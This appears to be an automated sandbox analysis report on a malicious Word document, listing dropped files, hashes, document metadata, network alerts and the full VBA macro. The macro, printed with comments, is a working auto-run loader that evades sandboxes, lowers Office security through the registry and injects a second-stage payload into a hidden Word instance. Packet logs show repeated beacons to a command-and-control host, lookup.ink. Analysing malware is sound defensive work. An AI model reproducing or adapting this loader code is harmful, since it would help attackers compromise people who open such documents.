              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:GIF image data, version 89a, 15 x 15
              Category:dropped
              Size (bytes):663
              Entropy (8bit):5.949125862393289
              Encrypted:false
              SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
              MD5:ED3C1C40B68BA4F40DB15529D5443DEC
              SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
              SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
              SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
              Malicious:false
              Reputation:high, very likely benign file
              Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.890812828412885
              Encrypted:false
              SSDEEP:3:EIXl+PWlllk7tqO/tlfl8tlqmyt7zM+ExKn:lzl/k0O/Cam4/dn
              MD5:A782C96ED0FC8B7422290C960402614F
              SHA1:47CBDD8328E8219C044638CF07B98E739CCEF495
              SHA-256:CFAC2DDA8DE7F78B50E872F5FF8D3F7F3AC3BB2CB4E277258E367EF3889152DE
              SHA-512:7708DA8D51E787B65483D553A3021E210DBBD884D4B4BD794AEA29C53BE31ED4207A6F686509E8119B1887094BF13440F5D86265FB5B3F6665B0654C3A8B36DB
              Malicious:false
              Preview:.user..................................................G.a.n.j.i...... .X.....<O`.....<O`.....X.......................X......u....e...^......?....e..........6...
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:false
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):27516
              Entropy (8bit):7.70082713704097
              Encrypted:false
              SSDEEP:384:/i8ztpAMlZ+vcDqSpj7UYYXNxt/ZtNNjlLcsSMiyORIoQjSYrrN3xa49Q4kvaQxE:/jnicve9xllNjlLcslBCI7a492S
              MD5:793F2291D5674537378233E57AFD4B67
              SHA1:01C2676034A8C19F84079E0A3B4E1D1C2726F5E6
              SHA-256:4836329572B4338FD61104BA9D6F2086CA335C34097E90783A90519BFE46AA4D
              SHA-512:1DAFCD05F5ED0636EFE214E2C3810B04FC6FC2A413E3598CE1100B447F9215DACD6EBB71A1841BEBBC787206A24F26B5915C8648D64CB97A54F17357CCC3B99D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:false
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):44468
              Entropy (8bit):7.83105809610787
              Encrypted:false
              SSDEEP:768:XSMfEdyzE7l7tmSLBLmxc0vFpZMHB5YCGCH9zXv0km6kyBZN:i6wyzE7l7tmSL7QFwHBggx0km6kybN
              MD5:6C9A4BAB33B7496A27AF8AAE4ABF4F5E
              SHA1:9501B5FEA6ECFFF2B5D61AA82EE7307296656657
              SHA-256:B4B939A979C2B4BD5B7FBF6F5DFBB3FF0E59B8BE04D68C7B5346D7B746E4313D
              SHA-512:3379DBBD62D2257DFF075AC89A379314DED34D266A71D55519438B6C1C3C60DC8576E2B6323C4E525A0D5328ACB533A52736781AD5CAF7FDC99546655D87629D
              Malicious:true
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.824637399168359
              Encrypted:false
              SSDEEP:3:EIXl+PWlllKBLllBqWllPl/l/flPl/RA+kFrR/uPbkJxKn:lzl/CL5qWXWxr5u5n
              MD5:D49DD152CDD7E36590D004F8A070CAF1
              SHA1:B823635D13098E0732A02EC81079B18BBE1C3B40
              SHA-256:CCC97CA6F8B638419D01AC1045F97DC6998B0B70C6A78061C215004BF7794328
              SHA-512:8A845F95E7F3D1FBB3EF246A4BAEC026513F4CF3FC81562698F3B7E9E35FF394974B31D34513169DA380362EAC3AFFE6FFD84CAD90EDEAD212C7F121885FD21D
              Malicious:false
              Preview:.user..................................................G.a.n.j.i.......P.#....<.......<......@.......................@.......f.f..e.......t..'....e..........6...
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):44468
              Entropy (8bit):7.83105809610787
              Encrypted:false
              SSDEEP:768:XSMfEdyzE7l7tmSLBLmxc0vFpZMHB5YCGCH9zXv0km6kyBZN:i6wyzE7l7tmSL7QFwHBggx0km6kybN
              MD5:6C9A4BAB33B7496A27AF8AAE4ABF4F5E
              SHA1:9501B5FEA6ECFFF2B5D61AA82EE7307296656657
              SHA-256:B4B939A979C2B4BD5B7FBF6F5DFBB3FF0E59B8BE04D68C7B5346D7B746E4313D
              SHA-512:3379DBBD62D2257DFF075AC89A379314DED34D266A71D55519438B6C1C3C60DC8576E2B6323C4E525A0D5328ACB533A52736781AD5CAF7FDC99546655D87629D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              File type:Microsoft Word 2007+
              Entropy (8bit):7.9711875335075595
              TrID:
              • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
              • Word Microsoft Office Open XML Format document (49504/1) 36.13%
              • Word Microsoft Office Open XML Format document (27504/1) 20.07%
              • ZIP compressed archive (8000/1) 5.84%
              File name:RoYAd85faz.doc
              File size:42'814 bytes
              MD5:ab5685ebf439f61c554977df1e1cd0c3
              SHA1:715724904dfb62a68887fa3d2d6d391b32cbd7b1
              SHA256:fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889
              SHA512:fc0eb6df2a25cb09f1431ac799b8d078e1dbc5e8ff664e06a5133175ff08a2068ac0bd185dc1e943dc7338ca5bc9f0de08473e117f213e5c3efb74c4bde40766
              SSDEEP:768:K5LoMrd9SPM7SVTqVZDngfIZ6DZH9A5fO3cfgw92j6pZliNEfQy/1mJW3vad:K5E+7Y+rgfIIilO3o92juiI7/1vg
              TLSH:7D13F134FC882915FBEEE73653901A5AFB720952AB4020370A6792D557CB7F00FF5899
              Icon Hash:35e1cc889a8a8599
              Document Type:OpenXML
              Number of OLE Files:1
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:True
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True
              Title:
              Subject:
              Author:Merey Kuandykov
              Keywords:
              Template:Normal.dotm
              Last Saved By:Merey Kuandykov
              Revision Number:36
              Total Edit Time:0
              Create Time:2023-09-28T05:41:00Z
              Last Saved Time:2023-10-09T04:26:00Z
              Number of Pages:3
              Number of Words:825
              Number of Characters:4703
              Creating Application:Microsoft Office Word
              Security:12
              Number of Lines:39
              Number of Paragraphs:11
              Thumbnail Scaling Desired:false
              Company:Microsoft
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:16.0000
              General
              Stream Path:VBA/ThisDocument
              VBA File Name:ThisDocument.cls
              Stream Size:5719
              Attribute VB_Name = "ThisDocument"
              Attribute VB_Base = "1Normal.ThisDocument"
              Attribute VB_GlobalNameSpace = False
              Attribute VB_Creatable = False
              Attribute VB_PredeclaredId = True
              Attribute VB_Exposed = True
              Attribute VB_TemplateDerived = True
              Attribute VB_Customizable = True
              Public objApp, wsl

              ' Returns the second-stage VBA source stored in the document variable "s2"
              Function danger()
                  danger = ActiveDocument.Variables.Item("s2")
              End Function

              ' Opens the dropped document in the hidden Word instance, saves it and closes it
              Function kokokokoko(namedoc)
                  Set doc2 = objApp.Documents.Open(namedoc)
                  doc2.Save
                  doc2.Close
              End Function

              ' Assembles "WScript.Shell" from string fragments and sets
              ' HKCU\Software\Microsoft\Office\<version>\Word\Security\AccessVBOM = 1 (REG_DWORD),
              ' which lets a macro write code into the VBA project of another document
              Sub verydanger()
                  strng = "WSc" & "ript.She"
                  strng = strng & "ll"
                  Set wsl = CreateObject(strng)
                  wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
              End Sub

              ' Auto-run entry point (Document_Open written with mixed casing)
              Sub documeNt_opEn()
                  On Error Resume Next
                  ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
                  ' Delete the last two shapes per page, then save the cleaned document
                  For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                      ActiveDocument.Shapes(i).Delete
                  Next i
                  ActiveDocument.Save
                  ' Busy-wait 20 seconds; abort if less than 15 seconds actually elapsed
                  ' (a check for sandboxes that accelerate sleeps)
                  sss = Now()
                  While Now < sss + TimeValue("00:00:20")
                      DoEvents
                  Wend
                  If Now() - sss < TimeValue("00:00:15") Then Exit Sub
                  verydanger
                  ' Start a hidden second Word instance with a new blank document
                  Set objApp = CreateObject("Word.Application")
                  objApp.Visible = False
                  Set doc = objApp.Documents.Add
                  ' Copy every document variable (including "s2") into the new document under a renamed key
                  For Each vars In ActiveDocument.Variables
                      doc.Variables.Add vars.Name & "ergegdr", vars
                      i = i + 1
                  Next
                  ' Inject the "s2" payload as VBA source into the new document's ThisDocument module
                  doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
                  ' Save it as a macro-enabled OOXML document (format 13) with a .doc name in %LOCALAPPDATA%\Temp, then open it
                  tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"
                  doc.SaveAs2 tmp, 13
                  doc.Close
                  kokokokoko (tmp)
              End Sub
              

              General
              Stream Path:PROJECT
              CLSID:
              File Type:ASCII text, with CRLF line terminators
              Stream Size:369
              Entropy:5.302139144655809
              Base64 Encoded:True
              Data ASCII (decoded):
              ID="{0C721A63-D383-403A-982A-05A30E7625B7}"
              Document=ThisDocument/&H00000000
              Name="Project"
              HelpContextID="0"
              VersionCompatible32="393222000"
              CMG="D5D749A6CB7FCF7FCF7FCF7FCF"
              DPB="AAA836910A920A920A"
              GC="7F7DE3CC6D7443754375BC"

              [HostExtenderInf
              General
              Stream Path:PROJECTwm
              CLSID:
              File Type:data
              Stream Size:41
              Entropy:3.0773844850752607
              Base64 Encoded:False
              Data ASCII (decoded): ThisDocument (ANSI), followed by ThisDocument (UTF-16LE)
              General
              Stream Path:VBA/_VBA_PROJECT
              CLSID:
              File Type:data
              Stream Size:3235
              Entropy:4.5261619436805
              Base64 Encoded:False
              Data ASCII (UTF-16LE decoded, truncated): *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.D
              General
              Stream Path:VBA/__SRP_0
              CLSID:
              File Type:data
              Stream Size:3509
              Entropy:3.443885782340945
              Base64 Encoded:False
              General
              Stream Path:VBA/__SRP_1
              CLSID:
              File Type:data
              Stream Size:238
              Entropy:2.11560831315699
              Base64 Encoded:False
              General
              Stream Path:VBA/__SRP_2
              CLSID:
              File Type:data
              Stream Size:3441
              Entropy:3.681817370422095
              Base64 Encoded:False
              General
              Stream Path:VBA/__SRP_3
              CLSID:
              File Type:data
              Stream Size:420
              Entropy:2.3674153773884705
              Base64 Encoded:False
              General
              Stream Path:VBA/dir
              CLSID:
              File Type:VAX-order 68K Blit (standalone) executable
              Stream Size:523
              Entropy:6.209506507265267
              Base64 Encoded:True
              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
              2025-01-13T21:38:36.141852+0100 | 2057742 | ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1 | 1 | 104.21.84.174 | 80 | 192.168.2.26 | 49712 | TCP
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jan 13, 2025 21:37:32.943687916 CET | 54052 | 53 | 192.168.2.26 | 1.1.1.1
              Jan 13, 2025 21:37:32.954824924 CET | 53 | 54052 | 1.1.1.1 | 192.168.2.26
              Jan 13, 2025 21:39:05.713301897 CET | 53 | 59706 | 1.1.1.1 | 192.168.2.26
              Jan 13, 2025 21:39:14.944700003 CET | 59706 | 53 | 192.168.2.26 | 1.1.1.1
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Jan 13, 2025 21:37:32.943687916 CET | 192.168.2.26 | 1.1.1.1 | 0x68d3 | Standard query (0) | lookup.ink | A (IP address) | IN (0x0001) | false
              Jan 13, 2025 21:39:14.944700003 CET | 192.168.2.26 | 1.1.1.1 | 0x18d0 | Standard query (0) | browser.events.data.msn.cn | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jan 13, 2025 21:36:54.125360012 CET | 1.1.1.1 | 192.168.2.26 | 0x8762 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
              Jan 13, 2025 21:36:54.125360012 CET | 1.1.1.1 | 192.168.2.26 | 0x8762 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
              Jan 13, 2025 21:37:32.954824924 CET | 1.1.1.1 | 192.168.2.26 | 0x68d3 | No error (0) | lookup.ink |  | 104.21.84.174 | A (IP address) | IN (0x0001) | false
              Jan 13, 2025 21:37:32.954824924 CET | 1.1.1.1 | 192.168.2.26 | 0x68d3 | No error (0) | lookup.ink |  | 172.67.195.112 | A (IP address) | IN (0x0001) | false
              Jan 13, 2025 21:39:14.952244043 CET | 1.1.1.1 | 192.168.2.26 | 0x18d0 | No error (0) | browser.events.data.msn.cn | global.asimov.events.data.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.26 | 49712 | 104.21.84.174 | 80 | 5828 | C:\Windows\System32\mshta.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 13, 2025 21:37:32.964709044 CET | 257 | OUT | PUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 13, 2025 21:37:32.965065956 CET | 84 | OUT | Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:37:33.623665094 CET | 1000 | IN | HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:37:33 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dELaEhawkkuXvVPTM8JxGcEH4sBeND0ZnTTMUPQPGU3KVRV0hZ%2ByjawdvR%2FIEMNRd%2FNr%2BPStFec3JFFsR0NpcWnr%2BTjcmBdiGo9MC8v7%2FjpVl1sqa4iDPDW1egAt"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90182f53b9eb42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=341&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:37:50.850955009 CET  303 OUT  PUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:37:50.851094961 CET  84 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:37:51.108333111 CET  943 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:37:51 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLG8%2BaZZkPlTwwPK8udI1X24MxSEhoSlzbheRa718DngVZSEnT7mJw36qFu3IU2qO%2FfCVEmbo0KxgctrdGhRh9U5HZlkd7Bh5s2AX1frNUXDjIgGYkcMsY8cZlLU"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90182fc12ad842b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1560&rtt_var=630&sent=5&recv=6&lost=0&retrans=0&sent_bytes=1000&recv_bytes=728&delivery_rate=1818181&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:06.470473051 CET  303 OUT  PUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:06.470580101 CET  84 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:06.742177010 CET  946 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:06 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=no32UhmwTkGowtYlD5o9myFHopqASF7VnHYekg5hW77luZDA6pM5octRkBD%2B8j54K7KtwgsH%2Fe%2BcUvVEUrxD5cPZy3leJb2p4o7iWWNQ4pOIeJNwmfA46BpGlgrr"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90183022cecd42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1560&rtt_var=707&sent=9&recv=9&lost=0&retrans=0&sent_bytes=1943&recv_bytes=1115&delivery_rate=1818181&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:22.568747997 CET  303 OUT  PUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:22.568927050 CET  84 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:22.861990929 CET  954 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:22 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xP%2BrqC1GxomETRwchlVtxTP9ajYHPj3im3YiPzNHTVFX9fBnedqTxM8Nq7Ajjmv9aDkKKbE%2FXJ%2B15W2%2BCX%2BHxea4IBG%2FrcHWBOnl3q1DhGt5ykvg6H9JlUIhXJBy"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830876d4542b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1552&rtt_var=567&sent=12&recv=11&lost=0&retrans=0&sent_bytes=2889&recv_bytes=1502&delivery_rate=1818181&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:35.781446934 CET  303 OUT  PUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:35.781575918 CET  84 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:36.116760969 CET  1236 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:36 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Vary: Accept-Encoding
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yID6umGoV795dnFI9mCy4NO8CAewK%2BZxGaRt0%2F%2FRdaVcXGHoQzGzrqCgLAj4WLMJ%2FwfssoyZfhK7ZsaG3xqhMd9suq5Q25R7b5S4fQ%2Bv0uH%2Bq95p6Cbqz41CsGHd"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830da283a42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1552&rtt_var=455&sent=16&recv=14&lost=0&retrans=0&sent_bytes=3843&recv_bytes=1889&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
